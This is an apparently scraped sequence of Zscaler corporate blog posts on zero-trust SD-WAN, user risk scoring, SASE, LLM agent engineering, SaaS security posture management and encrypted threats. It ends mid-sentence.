Zero Trust Exchange angekündigt. Heute darf ich Ihnen Zero Trust SD-WAN vorstellen — die branchenweit erste Zero-Trust-Lösung für die sichere Verbindung von Zweigstellen, Fabriken, Krankenhäusern, Einzelhandelsstandorten und Rechenzentren, die die Sicherheitsrisiken herkömmlicher SD-WANs beseitigt. Durch den Einsatz schlanker virtueller Maschinen oder Plug-&-Play-Appliances in Kombination mit der Zscaler Zero Trust Exchange bietet Zero Trust SD-WAN sichere Inbound- und Outbound-Zero-Trust-Netzwerke für Standorte, ohne Overlay-Routing, zusätzliche Firewall-Appliances oder Richtlinieninkonsistenzen. Zero Trust SD-WAN ist vollständig in unsere branchenführende SSE-Plattform integriert, ermöglicht robuste Sicherheit und vereinfacht das Management von Zweigstellennetzwerken. Außerdem geben wir die allgemeine Verfügbarkeit unserer Z-Connector-Plug-&-Play-Appliances — ZT 400, ZT 600 und ZT 800 — bekannt. Zusammen mit einem schlanken Formfaktor für virtuelle Maschinen können diese Appliances eine breite Palette von Kundenanforderungen unterstützen, die von 200 Mbit/s bis zu Multi-Gigabit reichen. Mit vordefinierten Konfigurationsvorlagen und Zero-Touch-Provisioning kann die Bereitstellung einer neuen Zweigstelle so einfach sein wie das Herstellen einer Internetverbindung. Neue Gateway-Funktionen Die Zero-Trust-SD-WAN-Lösung kann in zwei Modi bereitgestellt werden: als Forwarder oder als Gateway. Mit dem Forwarder-Modus können Kunden mit bestehenden WAN-Lösungen ein Zero-Trust-Overlay implementieren, indem sie die Z-Connector-Appliances neben ihren bestehenden Routern und Switches einsetzen. Relevanter Traffic kann durch bedingte DNS-Auflösung oder richtlinienbasiertes Routing an die Z-Connector-Appliances weitergeleitet werden. Der Gateway-Modus beendet die ISP-Verbindung direkt auf der Z-Connector-Appliance, wodurch keine zusätzlichen Router oder Firewalls erforderlich sind. Der Z-Connector fungiert als Standard-Gateway für den Standort und leitet den gesamten Traffic an die Zscaler Zero Trust Exchange weiter, die sichere Konnektivität zu Internet, SaaS und privaten Anwendungen bereitstellt. Der Gateway-Modus unterstützt umfangreiche WAN- und LAN-Verwaltungsfunktionen, einschließlich dualer ISP-Terminierung, anwendungsorientierter Pfadauswahl mit ISP-Überwachung, hoher Verfügbarkeit (aktiv-aktiv, aktiv-passiv), mehrerer LAN-Subnetzwerke, lokaler Firewall, integriertem DHCP-Server und DNS-Gateway. Die Funktionen des Zero-Trust-SD-WAN-Gateways sind ab Februar 2024 verfügbar. Zero Trust SD-WAN reduziert Komplexität und Risiken Zero Trust SD-WAN bewältigt viele zentrale Herausforderungen unserer Kunden. Hier sind einige wichtige Anwendungsfälle: Ersatz für Site-to-Site-VPNs: Vermeiden Sie komplexe VPN-Konfigurationen und die Verwaltung von Routingtabellen und unterbinden Sie die laterale Ausbreitung von Bedrohungen. Schnellere Integrationen bei Fusionen und Übernahmen: Verbinden Sie User mit Anwendungen in verschiedenen Unternehmen, ohne Routing-Domains zusammenführen oder NAT-Gateways einsetzen zu müssen. Verkürzen Sie die Integrationszeit von Monaten auf Tage. Sichere OT-Konnektivität: Verzichten Sie auf VPNs und ungeschützte Ports für den Remote-Zugriff von Anbietern auf OT-Ressourcen. IoT-Erkennung und -Klassifizierung: Erkennen und schützen Sie IoT-Geräte im Netzwerk mit KI-gestützten Klassifizierungs-Engines. Weitere Informationen zu diesen Anwendungsfällen finden Sie in unserem Blog zur Einführung von Zero Trust in Zweigstellen. Branchenweit erste SASE-Plattform, die auf Zero Trust basiert Secure Access Service Edge (SASE) ist ein von Gartner geprägter Begriff, der die Zusammenführung von Networking und Sicherheit zur Anpassung an moderne IT-Infrastrukturen und Arbeitsstrukturen beschreibt. Obwohl SASE die Zero-Trust-Prinzipien einbezieht, werden bei vielen SASE-Lösungen auf dem Markt einfach herkömmliches SD-WAN mit einem SSE-Service verbunden, wobei die Zero-Trust-Prinzipien lediglich für den Zugriff von Usern auf Anwendungen gelten. Dadurch bleiben Standorte durch übermäßiges implizites Vertrauen weiterhin ungeschützt. Zero Trust SD-WAN von Zscaler ist die branchenweit erste SASE-Plattform aus einer Hand, die auf Zero Trust und KI basiert. Mithilfe von Zero Trust SASE können Unternehmen Zero Trust nicht nur auf User, sondern auch auf Zweigstellen, Fabriken und Rechenzentren ausweiten. Auf Grundlage der Leistungsfähigkeit unserer SSE-Plattform — der Zero Trust Exchange — reduziert Zero Trust SASE Kosten und Komplexität, da herkömmliche Sicherheits- und Netzwerklösungen nicht mehr benötigt werden. Transformation der Zweigstellennetzwerke Veraltete WAN-Architekturen haben ausgedient. Die branchenweiten Veränderungen rund um hybrides Arbeiten und Zero-Trust-Sicherheit bieten eine einzigartige Gelegenheit, Ihre Netzwerkarchitektur zu überdenken und umzugestalten. Zero Trust SD-WAN und SASE verfolgen einen völlig neuen Ansatz für die Verbindung von Usern, Geräten und Anwendungen ohne das Risiko lateraler Bedrohungsbewegungen. Auf unserer Seite mit Informationen zu SASE finden Sie weitere Produktdetails, Whitepapers und Videos. Mehr über die Funktionen von Zero Trust SD-WAN erfahren Sie hier. Mon, 22 Jan 2024 17:50:01 -0800 Naresh Kumar How Zscaler’s Dynamic User Risk Scoring Works Access control policies aim to balance security and end user productivity, yet often fall short due to their static nature and limited ability to adapt to evolving threats. But what if there was an easy way to automate access control per user, considering individual risk factors and staying up-to-date with the latest advanced attacks? Zscaler User Risk Scoring takes dynamic access control and risk visibility to the next level using records of previous behavior to determine future risk. Similar to how insurance companies use driving records to determine car insurance rates, or banks use credit scores to assess loan eligibility, user risk scoring leverages previous behavior records to assign risk scores to individual users. This allows organizations to set dynamic access control policies based on various risk factors, accounting for the latest threat intelligence. User risk scoring empowers organizations to restrict access to sensitive applications for users with a high risk score until their risk profile improves. By considering factors such as past victimization by cyberattacks, near-misses with malicious content, or engagement in behavior that could lead to a breach, organizations can ensure that access control policies are tailored to individual risk profiles. Organizations can set user risk thresholds to allow or deny access to both private and public application How does user risk scoring work? User risk scoring plays a crucial role across the Zscaler platform, driving policies for URL filtering, firewall rules, data loss prevention (DLP), browser isolation, and Zscaler Private Access (ZPA); and feeding into overall risk visibility in Zscaler Risk360. By leveraging user risk scores within each of these security controls, organizations can better protect all incoming and outgoing traffic from potential threats. URL filtering rules are one way that risk scoring can be applied to policies within Zscaler Internet Access (ZIA) The risk scoring process consists of two components: the static (baseline) risk score and the real-time risk score. The static risk score is established based on a one-week lookback at risky behavior and is updated every 24 hours. The real-time risk score modifies this baseline every 2 minutes throughout the day, updating whenever a user interacts with known or suspected malicious content. Each day at midnight, the real-time risk score is reset. Zscaler considers more than 65 indicators that influence the overall risk score. These indicators fall into three major categories: pre-infection behavior, post-infection behavior, and more general suspicious behavior. The model accounts for the fact that not all incidents are equal; each indicator has a variable contribution to the risk score based on the severity and frequency of the associated threat. Pre-infection behavior indicators encompass a range of blocked actions that would have led to user infection, such as blocked malware, known and suspected malicious URLs, phishing sites, pages with browser exploits, and more. Post-infection behavior indicators include things like detected botnet traffic or command-and-control traffic, which show that a user/device has already been compromised. Suspicious behavior indicators are similar to pre-infection indicators but are less severe (and less guaranteed to lead to infection), covering policy violations and risky activities like browsing deny-listed URLs, DLP compliance violations, anonymizing sites, and more. *A more detailed sampling of these indicators is included at the bottom of this article. How can Zscaler customers use risk scoring? User risk scores can be found in the the analytics and policy administration menus of both Zscaler Internet Access (ZIA) and Zscaler Private Access (ZPA). They are also woven together with a range of additional inputs in Zscaler Risk360, which allows security teams to delve deeper into their organization’s holistic risk. Organizations can monitor risk scores for individuals and for the overall organization Zscaler also has deep integrations with many leading security operations tools, allowing the same telemetry and incident alert context that feeds into risk scoring to be shared with tools like SIEM, SOAR, and XDR via a REST API to streamline workflows. These scores can be used to: Drive access control policies User risk scoring gives network and security teams a powerful tool to use to drive low-maintenance zero trust access control policies, controlling both incoming and outgoing internet and application traffic. It can be combined with other dynamic rulesets (e.g., device posture profiles) and static rulesets (e.g., URL and DNS filtering and app control policy) to protect organizations from breaches without unnecessarily restricting user productivity. User risk, device posture, and other access policies work together seamlessly to optimize secure access Monitor overall organizational risk and key factors that can be improved Admins can monitor their company risk over time to assess the top areas of overall company risk and prioritize remediation efforts. They can see how risk scores are distributed across users and locations, and can benchmark their risk score against other companies in their industry. Company risk scores can be analyzed over time against industry benchmarks Monitor risky users on an individual basis and understand how (and why) their risk is trending If a user’s risk score spikes, admins can take action, whether that be isolating that user’s machine to deal with an active threat, or simply training a user that certain behaviors are posing an unacceptable risk. Admins can analyze individual users and double-click into specific incidents Overall, Zscaler User Risk Scoring, with its categorization of threats and aggregation of logs, offers valuable insights into an organization's security posture. By understanding the different types of risks and behaviors associated with cyberthreats, organizations can implement dynamic access control policies and proactively protect their critical assets and data. With risk scoring, organizations can navigate the ever-changing threat landscape with confidence. To learn about more of Zscaler’s unique inline security capabilities, check out our Cyberthreat Protection page. Sample Indicators for User Risk Scoring · Pre-infection behavior includes a range of blocked actions that would have likely led a user to be infected, such as: o Malware blocked by Zscaler’s Advanced Threat Protection or inline Sandbox o Blocked known and suspected malicious URLs o Blocked websites with known and suspected phishing content o Blocked pages with known browser exploits o Blocked known and suspected adware and spyware o Blocked pages with a high PageRisk score o Quarantined pages o Blocked files with known vulnerabilities o Blocked emails containing viruses o Detected mobile app vulnerabilities · Post-infection behavior includes a range of blocked actions that were attempted after a user was infected, such as: o Botnet traffic o Command-and-control traffic · Suspicious behavior includes policy violations and other risky sites, files, and conditions that could lead to infection, such as: o Deny-listed URLs o DLP compliance violations o Pages with known dangerous ActiveX controls o Pages vulnerable to cross-site scripting attacks o Possible browser cookie theft o Internet Relay Chat (IRC) tunneling use o Anonymizing sites o Blocks or warnings from secure browsing about an outdated/disallowed component o Peer-to-peer (P2P) site denials o Webspam sites o Attempts to browse blocked URL categories o Mobile app issues included denial of the mobile app, insecure user credentials, location information leaks, personally identifiable information (PII), information identifying the device, or communication with unknown servers o Tunnel blocks o Fake proxy authentication o SMTP (email) issues including rejected password-encrypted attachments, unscannable attachments, detected or suspected spam, rejected recipients, DLP blocks or quarantines, or blocked attachments o IPS blocks of cryptomining & blockchain traffic o Reputation-based blocks of suspected adware/spyware sites o Disallowed use of a DNS-over-HTTPS sit Fri, 19 Jan 2024 05:00:01 -0800 Mark Brozek It’s Time for Zero Trust SASE The workplace has changed for good. According to a recent Gallup poll, 50% of US employees are working in hybrid mode and only 20% are entirely on-site. Another forecast analysis from Gartner projected hybrid work being the norm for almost 40% of global knowledge workers by the end of 2023. Branch offices no longer look the same, and more and more organizations are moving to a cafe-like model for their workplaces. Combined with the shift to cloud and SaaS, this is driving fundamental shifts in IT infrastructure. The way we design, build, and secure our networks needs to evolve to support this new normal. One size does not fit all The old network-centric model of connectivity and security presents challenges when users and apps are everywhere. Trying to shoehorn traditional firewall/VPN-based security into an increasingly fuzzy and complex network environment has only resulted in more cost, complexity, and risk. Cyberattacks keep rising despite the increasing spend on firewalls, fueling threats such as ransomware. According to Zscaler ThreatLabz, ransomware attacks increased almost 40% between 2022 and 2023, with the average demand being $5.3M. The current generation of networking technologies was designed to solve problems from 30 years ago, when IT systems couldn’t talk to each other. It’s no surprise that we ended up with a networking stack designed to maximize connectivity and reachability between users and computing systems globally. While this has unlocked vast amounts of productivity gains and business value, it has come at the expense of cyber risk. An attacker needs to find just one entry point anywhere in the organization and can move laterally from there to access critical crown jewel applications and data. With an attack surface spanning branches, retail locations, clouds, remote users, and partners, securing traditional network infrastructure has become a complex and costly endeavor. Zero trust is disrupting networking Zero trust is a cybersecurity strategy that shifts the focus from networks to entities—users, devices, apps, and services. It asserts that no entity should be trusted by default and should only be explicitly allowed to access certain resources based on identity, context, and security posture, and then continuously reassessed for every new connection. Traditional networking does not lend itself to the zero trust model since it confers implicit trust—once you’re on the network, you can go anywhere and talk to any entity. Network architects can limit the amount of trust and the extent of lateral movement by segmenting the network, but this is complex and difficult to manage—it’s like building a superhighway system and adding checkpoints at every ramp and interchange. Zero trust networking is an opportunity to fundamentally rethink the way we build enterprise networks. Instead of starting with fully trusted routed overlays, we need to start with a zero trust foundation and then connect entities into an exchange that can broker connections as needed based on context and security posture. Figure: Zero Trust Architecture Traditional SD-WAN is not zero trust Traditional SD-WAN arrived on the scene over a decade ago and was meant to give organizations an alternative to expensive MPLS WAN services. Using multiple ISP connections and active path monitoring, SD-WANs drastically improved the overall reliability and performance of internet connections and offered organizations the confidence that mission-critical apps can work over the internet. Fast-forward a decade and through a global pandemic, and we no longer need to prove that the internet is fast and reliable enough to run enterprise apps. Gigabit fiber connections are readily available and most SaaS apps are optimized to be consumed over the internet. SD-WAN needs to solve different problems today—like ensuring a consistent experience and security for users between home and office, securing IoT device traffic and extending zero trust security to all sites, without the use of additional firewall/VPN appliances. Secure Access Service Edge (SASE) Gartner coined the term SASE in 2019 to describe the convergence of security and networking, delivered from a common cloud native platform that is better aligned with modern traffic flows. SASE is widely understood to be a combination of security services such as FWaaS, SWG, CASB, DLP, and connectivity services such as ZTNA and SD-WAN, delivered from the cloud. The shift to SASE represents an opportunity to rethink and rebuild security services from the ground up for cloud scale. Yet many SASE solutions simply extend the firewall/VPN model to the cloud and deliver a hosted version of the traditional security appliances. With bolted-on SD-WAN integrations, these solutions fail to deliver the promise of zero trust for anything beyond users. A better way Zscaler pioneered zero trust security for remote users and eliminated clunky remote-access VPNs, reducing cyber risk for thousands of organizations globally. We built an industry-leading AI-powered SSE platform that has been a leader in the Gartner Magic Quadrant for SSE two years in a row. Now, we’re excited to bring the same zero trust security to branches, factories, retail stores, and data centers. Join us on January 23 as we announce our industry-first SD-WAN innovations that help you transform your security and networking architecture with a Zero Trust SASE platform built on zero trust AI. Hear from your industry peers about their transformation journeys and the benefits they realized. Register now and save your spot! Tue, 16 Jan 2024 16:39:35 -0800 Ameet Naik The Mythical LLM-Month It’s clear: 2023 was the year of AI. Beginning with the release of ChatGPT, it was a technological revolution. What began as interacting agents quickly started moving to indexing documents (RAG), and now, indexing documents, connecting to data sources, and enabling data analysis with a simple sentence. With the success of ChatGPT, a lot of people promised last year to deliver large language models (LLMs) soon … and very few of those promises have been fulfilled. Some of the important reasons for that are: We are building AI agents, not LLMs People are treating the problem as a research problem, not an engineering problem Bad data In this blog, we’ll examine the role of AI agents as a way to link LLMs with backend systems. Then, we'll look at how the use of intuitive, interactive semantics to comprehend user intent is setting up AI agents as the next generation of user interface and user experience (UI/UX). Finally, with upcoming AI agents in software, we’ll talk about why we need to bring back some principles of software engineering that people seem to have forgotten in the past few months. I Want a Pizza in 20 Minutes LLMs offer a more intuitive, streamlined approach to UI/UX interactions compared to traditional point-and-click methods. To illustrate this, suppose you want to order a “gourmet margherita pizza delivered in 20 minutes” through a food delivery app. This seemingly straightforward request can trigger a series of complex interactions in the app, potentially spanning several minutes of interactions using normal UI/UX. For example, you would probably have to choose the "Pizza" category, search for a restaurant with appetizing pictures, check if they have margherita pizza, and then find out whether they can deliver quickly enough—as well as backtrack if any of your criteria aren’t met. This flowchart expresses the interaction with the app. We Need More than LLMs LLMs are AI models trained on vast amounts of textual data, enabling them to understand and generate remarkably accurate human-like language. Models such as OpenAI's GPT-3 have demonstrated exceptional abilities in natural language processing, text completion, and even generating coherent and contextually relevant responses. Although more recent LLMs can do data analysis, summary, and representation, the ability to connect external data sources, algorithms, and specialized interfaces to an LLM gives it even more flexibility. This can enable it to perform tasks that involve analysis of domain-specific real-time data, as well as open the door to tasks not yet possible with today’s LLMs. This “pizza” example illustrates the complexity of natural language processing (NLP) techniques. Even this relatively simple request necessitates connecting with multiple backend systems, such as databases of restaurants, inventory management systems, delivery tracking systems, and more. Each of these connections contributes to the successful execution of the order. Furthermore, the connections required may vary depending on the request. The more flexibility you want the system to understand and recognize, the more connections to different backend systems will need to be made. This flexibility and adaptability in establishing connections is crucial to accommodate diverse customer requests and ensure a seamless experience AI Agents LLMs serve as the foundation for AI agents. To respond to a diverse range of queries, an AI agent leverages an LLM in conjunction with several integral auxiliary components: The agent core uses the LLM and orchestrates the agent's overall functionality. The memory module enables the agent to make context-aware decisions. The planner formulates the agent’s course of action based on the tools at hand. Various tools and resources support specific domains, enabling the AI agent to effectively process data, reason, and generate appropriate responses. The set of tools include data sources, algorithms, and visualizations (or UI interactions). Agent core The agent core is the “brain” of the AI agent, managing decision-making, communication, and coordination of modules and subsystems to help the agent operate seamlessly and interact efficiently with its environment or tasks. The agent core receives inputs, processes them, and generates actions or responses. It also maintains a representation of the agent's knowledge, beliefs, and intentions to guide its reasoning and behavior. Finally, the core oversees the update and retrieval of information from the agent's memory to help it make relevant, context-based decisions Memory The memory module encompasses history memory and context memory components, which store and manage data the AI agent can use to simultaneously apply past experiences and current context to inform its decision-making. History memory stores records of previous inputs, outputs, and outcomes. These records let the agent learn from past interactions and gain insights into effective strategies and patterns that help it make better-informed decisions and avoid repeating mistakes. Context memory, meanwhile, enables the agent to interpret and respond appropriately to the specific, current circumstances using information about the environment, the user's preferences or intentions, and many other contextual factors Planner The planner component analyzes the state of the agent’s environment, constraints, and factors such as goals, objectives, resources, rules, and dependencies to determine the most effective steps to achieve the desired outcome. Here’s an example of a prompt template the planner could use, according to Nvidia: GENERAL INSTRUCTIONS You are a domain expert. Your task is to break down a complex question into simpler sub-parts. If you cannot answer the question, request a helper or use a tool. Fill with Nil where no tool or helper is required. AVAILABLE TOOLS - Search Tool - Math Tool CONTEXTUAL INFORMATION <information from Memory to help LLM to figure out the context around question> USER QUESTION “How to order a margherita pizza in 20 min in my app?” ANSWER FORMAT {"sub-questions":["<FILL>"]} Using this, the planner could generate a plan to serve as a roadmap for the agent's actions, enabling it to navigate complex problems and strategically accomplish its goals Tools Various other tools help the AI agent perform specific tasks or functions. For example: Retrieval-augmented generation (RAG) tools enable the agent to retrieve and use knowledge base content to generate coherent, contextually appropriate responses. Database connections allow the AI agent to query and retrieve relevant information from structured data sources to inform decisions or responses. Natural language processing (NLP) libraries offer text tokenization, named entity recognition, sentiment analysis, language modeling, and other functionality. Machine learning (ML) frameworks enable the agent to leverage ML techniques such as supervised, unsupervised, or reinforcement learning to enhance its capabilities. Visualization tools help the agent represent and interpret data or outputs visually, and can help the agent understand and analyze patterns, relationships, or trends in the data. Simulation environments provide a virtual environment where the agent can sharpen its skills, test strategies, and evaluate potential outcomes without affecting the real world. Monitoring and logging frameworks facilitate the tracking and recording of agent activities, performance metrics, or system events to help evaluate the agent's behavior, identify potential issues or anomalies, and support debugging and analysis. Data preprocessing tools use techniques like data cleaning, normalization, feature selection, and dimensionality reduction to ensure raw data is relevant and high-quality before the agent ingests it. Evaluation frameworks provide methodologies and metrics that enable the agent to measure its successes, compare approaches, and iterate on its capabilities. These and other tools empower AI agents with functionality and resources to perform specific tasks, process data, make informed decisions, and enhance their overall capabilities Adding LLM-based Intelligent Agents to Your Data Is an Engineering Problem, Not a Research Problem People realized that natural language can make it much easier and forgiving (not to say relaxed) to specify use cases required for software development. Because the English language can be ambiguous and imprecise, this is leading to a new problem in software development, where systems are not well specified or understood. Fred Brooks outlined many central software engineering principles in his 1975 book The Mythical Man-Month, some of which people seem to have forgotten during the LLM rush. For instance: No silver bullet. This is the first principle people have forgotten with LLMs. They believe LLMs are the silver bullet that will eliminate the need for proper software engineering practices. The second-system effect. LLM-based systems are being considered a second system because people treat LLMs as so powerful that they can forget LLM limitations. The tendency toward an irreducible number of errors. Even if you get the LLM implementation correct, LLMs can hallucinate or even expose additional errors that have been hidden because of lack of a way to exercise the backend in ways we have not been able to in the past. Progress tracking. I remember the first thing I heard from Brooks’ book was, “How does a project get to be a year late? One day at a time.” I have seen people assuming that if they sweep problems under the rug they will disappear. Machine learning models, and LLMs in particular, inherit the same problems of ill-designed systems with the addition of amplification of bad data, which we will describe later. Conceptual integrity. This problem has shifted from designing the use cases (or user stories) so that they show the conceptual integrity of the entire system to saying the LLM will bind any inconsistencies in the software magically. For example, if you want to have a user story that solves the order of a food app “I want to order a gourmet margherita pizza in 20 min”, by changing the question to: Can I get a gourmet margherita pizza delivered in 20 minutes? Show me all pizza places that can deliver a gourmet margherita pizza in 20 minutes. Show me all pizza places that can deliver a gourmet margherita pizza in 20 minutes ranked by user preference. We can easily see that different types of data, algorithms, and visualizations are required to address this problem. The manual and formal documents. Thanks to hype, this is probably the most forgotten principle in the age of LLMs. It’s not enough to say “develop a system that will tell me how to order things like a gourmet margherita pizza in 20 minutes.” This requires documentation of a whole array of other use cases, required backend systems, new types of visualizations to be created, and—crucially—specifications of what the system will not do. “Things like” seems to have become a norm in LLM software development, as if an LLM can magically connect to backend systems and visualize data it has never learned to understand. The pilot system. Because of these limitations, software systems with LLM based intelligent agents have not left the pilot stage in several companies simply because they are not able to reason beyond simple questions used as “example of use cases.” In a recent paper, we addressed the first issue of lack of proper specification of software systems, and showed a way we can create formal specifications for LLM-based intelligent systems, in a way that they can follow sound software engineering principles Bad Data In a recent post on LinkedIn, we described the importance of “librarians” to LLM-based intelligent agents. (Apparently, this post was misunderstood, as several teachers and actual librarians liked the post.) We were referring to the need to use more formal data organization and writing methodologies to ensure LLM-based intelligent agents work. The cloud fulfilled its promise of not requiring us to delete data, just letting us store it. With this came the pressure to quickly create user documentation. This created a “data dump,” where old data lives with new data, where old specifications that were never implemented are still alive, where outdated descriptions of system functionalities persist, having never been updated in the documentation. Finally, documents seem to have forgotten what a “topic sentence” is. LLM-based systems expect documentation to have well-written text, as recently shown when OpenAI stated that it is “impossible” to train AI without using copyrighted works. This alludes not only to the fact that we need a tremendous amount of text to train these models, but also that good quality text is required. This becomes even more important if you use RAG-based technologies. In RAG, we index document chunks (for example, using embedding technologies in vector databases), and whenever a user asks a question, we return the top ranking documents to a generator LLM that in turn composes the answer. Needless to say, RAG technology requires well-written indexed text to generate the answers. RAG pipeline, according to Conclusions We have shown that there is an explosion of LLM-based promises in the field. Very few are coming to fruition. It is time that in order to build AI intelligent systems we need to consider we are building complex software engineering systems, not prototypes. LLM-based intelligent systems bring another level of complexity to system design. We need to consider up to what extent we need to specify and test such systems properly, and we need to treat data as a first-class citizen, as these intelligent systems are much more susceptible to bad data than other systems Tue, 16 Jan 2024 19:14:07 -0800 Claudionor Coelho Jr. Unleashing the Power of Zscaler's Unparalleled SaaS Security Zscaler has made great strides in securing organizations across the board, solving real customer use cases such as protecting against ransomware, AI security, and securing data everywhere. One area that has received a lot of attention is SaaS security. Recently, Forresters released its latest Wave report for SaaS Security Posture Management, naming Zscaler as the only Leader in this category. The report puts a heavy emphasis on use cases that span beyond posture management such as app governance, shadow IT, identity access controls, advanced data protection, and more. Zscaler achieved the strongest position, achieving a perfect score in 7 out of the 12 categories. You can get your copy of the Forrester Wave here. As organizations increasingly adopt numerous SaaS-based services, there is a growing need for a comprehensive, fully integrated data security solution that covers all channels, including web, business and personal applications, public cloud data, endpoints, and email. Platforms provide multiple benefits, such as centralized policy creation, that reduces complexity and costs inherent in point vendor solutions. Solving Today’s Key SaaS Security Challenges Many organizations use multiple point solutions, which can create issues and headaches for IT and security teams. Here are some of the top use cases that are drive SaaS Security: Identity Management and Access Control To prevent leaks, data manipulation, and insider threats, users must be authenticated and authorized in line with zero trust principles for least-privileged access, including role-based access control and continuous monitoring. Effective anti-phishing measures are also critical. Identity and access issues mostly often stem from: Weak or compromised identity and access management (IAM) A lack of multifactor authentication (MFA) beyond single sign-on (SSO) Inadequate or misconfigured access controls Lack of Standardization Inconsistent security policies and procedures across SaaS providers can create challenges for security teams around consistent controls and enforcement, leading to a weaker posture, potential enforcement gaps, vulnerabilities, and even data corruption. Some of the major contributors to increased risk in this area include: Interoperability and integration issues between cloud providers Data transfers between environments Regulatory compliance challenges Data Residency and Governance Complying with industry and government data protection regulations can be complex when SaaS providers run widely distributed operations. It’s critical to understand how a given SaaS provider aligns with your organization’s compliance requirements, as well as to implement effective data encryption and access controls for data in transit and at rest. Common residency and governance issues arise from: Sovereignty and residency regulations (e.g., GDPR) Shared responsibilities between the customer and SaaS provider Unsanctioned apps (shadow IT) putting data outside the IT function’s purview To mitigate these risks, organizations should conduct thorough risk assessments, implement robust security policies and controls, regularly monitor SaaS applications for vulnerabilities, and stay up to date with security best practices. Furthermore, integrated solutions provide greater efficacy and context. Securing SaaS Platforms Requires Context The Power of Context In the realm of security, it’s essential to understand that it’s a matter of layers. These layers often converge, such as in the case of SSPM and data security. However, to truly grasp the significance of these layers, you need context. The ability to combine and analyze information from various security layers gives organizations a comprehensive understanding of their security posture and potential vulnerabilities. A Comprehensive, Unified Solution: Zscaler Data Protection brings together all the necessary components and functionality required for robust SaaS security. From access control and connectivity to SaaS and cloud integrations, our solution covers every aspect of securing your SaaS applications. Enhanced Data and Threat Security: With Zscaler, organizations can rest assured that their sensitive data is protected. Our platform offers robust data security measures, to ensure sensitive information remains secure and compliant with industry regulations. Furthermore, our threat security functionality helps identify and mitigate potential threats, safeguarding your SaaS applications from malicious attacks. Contextual Understanding for Effective Security: The power of our Advanced SSPM lies in its ability to combine and analyze information from various security layers. By providing a comprehensive context, organizations can make informed decisions and implement security measures that address their specific needs and vulnerabilities. Zscaler Advanced SSPM for SaaS Security We have invested substantial efforts in developing and expanding our solutions to meet the evolving landscape of SaaS security. For instance, our acquisition of Canonic in 2023, now known as AppTotal, lets Zscaler better help your organization detect and secure risky third-party app integrations into SaaS. This functionality was highlighted in this year’s Forrester SSPM Wave. Our Advanced SSPM incorporates access control, connectivity, SaaS integrations, cloud integrations, and data and threat security functionalities. Our comprehensive approach ensures that organizations can leverage the full spectrum of security measures required for safeguarding their SaaS applications Ready to secure your SaaS Platforms? Zscaler's Advanced SSPM stands out from the crowd due to its unique combination of components, capabilities, and reach. With a holistic approach encompassing access control, connectivity, SaaS integrations, cloud integrations, and robust data and threat security functionality, our solution empowers organizations to achieve unparalleled security for their SaaS applications. By leveraging the power of context, Zscaler's Advanced SSPM enables organizations to make informed decisions and implement effective security measures. Trust Zscaler to unlock the true potential of your SaaS security and elevate your organization's overall security posture. To learn more about Zscaler’s Advanced SSPM and Data Protection offering, visit our website, register for our webinar, or reach out to us for a demo. Wed, 17 Jan 2024 00:01:01 -0800 Salah Nassar 4 Ways Enterprises Can Stop Encrypted Cyber Threats Want to uncover the 86% of cyber threats lurking in the shadows? Join our January 18th live event with Zscaler CISO Deepen Desai to learn how enterprises can stop encrypted attacks, as well as explore key cyber threat trends from ThreatLabz. In today's digital world, we’ve come to trust HTTPS as the standard for encrypting and protecting data as it flows across the internet — the reassuring lock icon in a browser’s icon bar assures us our data is safe. Organizations worldwide have rightfully recognized this protocol as an imperative for data security and digital privacy, and overall, 95% of internet-bound traffic is secured with HTTPS. But encryption is a double-edged sword. In the same way that encryption prevents cybercriminals from intercepting sensitive data, it also prevents enterprises from detecting cyber threats. As we revealed in our ThreatLabz 2023 State of Encrypted Attacks Report, more than 85% of cyber threats hide behind encrypted channels, including malware, data stealers, and phishing attacks. What’s more, many encrypted attacks use legitimate, trusted SaaS storage providers to host malicious payloads, making detection even more challenging. Encrypted channels are a major blindspot for any organization that is not performing SSL inspection today, enabling threat actors to launch hidden threats and exfiltrate sensitive data under cover of darkness. As threats advance and the number of malicious actors grows, these types of attacks continue to increase. ThreatLabz analyzed more than 29 billion blocked threats over the Zscaler Zero Trust Exchange from September 2022 to October 2023, finding a 24.3% increase year over year, with a notable growth in phishing attacks and significant 297.1% and 290.5% growth for browser exploits and ad spyware sites, respectively. So, what can enterprises do to thwart encrypted attacks? The answer is simple: inspect all encrypted traffic. However, the reality of this task remains a huge challenge for most organizations. To fix the problem, we must first explore and understand why this is the case. A major enterprise blind spot: SSL/TLS Traffic As part of the 2023 State of Encrypted Attacks Report, ThreatLabz commissioned a separate third-party, vendor neutral survey of security, networking, and IT practitioners to better understand their challenges, goals, and experience with encrypted attacks. We found that 62% of organizations have experienced an uptick in encrypted threats — with the majority having experienced an attack, and 82% of those witnessing attacks over “trusted” channels. However, enterprises face numerous challenges that prevent them from scanning 100% of SSL/TLS traffic at scale — the antidote to encrypted threats. The most popular tools for SSL/TLS scanning include a mix of network firewalls (62%) and application-layer firewalls (59%). These tools come with challenges at scale, the survey found; the top barriers preventing enterprises from scanning 100% of encrypted traffic today include performance issues and poor user experience (42%), cost concerns (32%), and scalability issues with the current setup (31%). Notably, a further barrier for 20% of respondents is that traffic from trusted sites and applications is “assumed safe” — which, our research shows, is not the case. These issues point to challenges that are in contrast with enterprise inspection plans. While 65% of enterprises plan to increase rates of SSL/TLS inspection in the next year, 65% are also concerned that their current SSL/TLS inspection tools are not scalable or future-proofed to address advanced cyber threats. This finding echoes enterprises’ confidence in their security setups: just 30% of enterprises are "very" or "extremely" confident in their ability to stop advanced or sophisticated cyber threats. These findings suggest that while enterprises are well aware of the risk of encrypted attacks, encrypted channels remain a prominent blind spot to many organizations — and many attacks can simply pass through without detection. Shining a light on cyber threats lurking in encrypted traffic Threat actors are exploiting encrypted channels across multiple stages of the attack chain: from gaining initial entry through tools like VPN to establishing footholds with phishing attacks, to delivering malware and ransomware payloads, to moving laterally through domain controllers, to exfiltrating data, oftentimes using trusted SaaS storage providers and more. Knowing this, enterprises should include mechanisms in their security plans to stop encrypted threats and prevent data loss at each stage of the attack chain. Here are four approaches that enterprises can adopt to prevent encrypted attacks and keep their data, customers, and employees secured. Figure 1: stopping encrypted cyber threats across the attack chain 1. Inspect 100% of encrypted SSL/TLS traffic at scale with a zero trust, cloud-proxy architecture The key to an enterprise strategy to stop encrypted attacks starts with an ability to scan 100% of encrypted traffic and content at scale, with zero performance degradation — that’s step one. A zero trust architecture is an outstanding candidate for this task for a number of key reasons. Based on the principle of least privilege, this architecture brokers connections directly between users and applications — never the underlying network — based on identity, context, and business policies. Therefore, all encrypted traffic and content flows through this cloud-proxy architecture, with SSL/TLS inspection for every packet from every user on a per-user basis with infinite scale, regardless of how much bandwidth users consume. In addition to this, direct 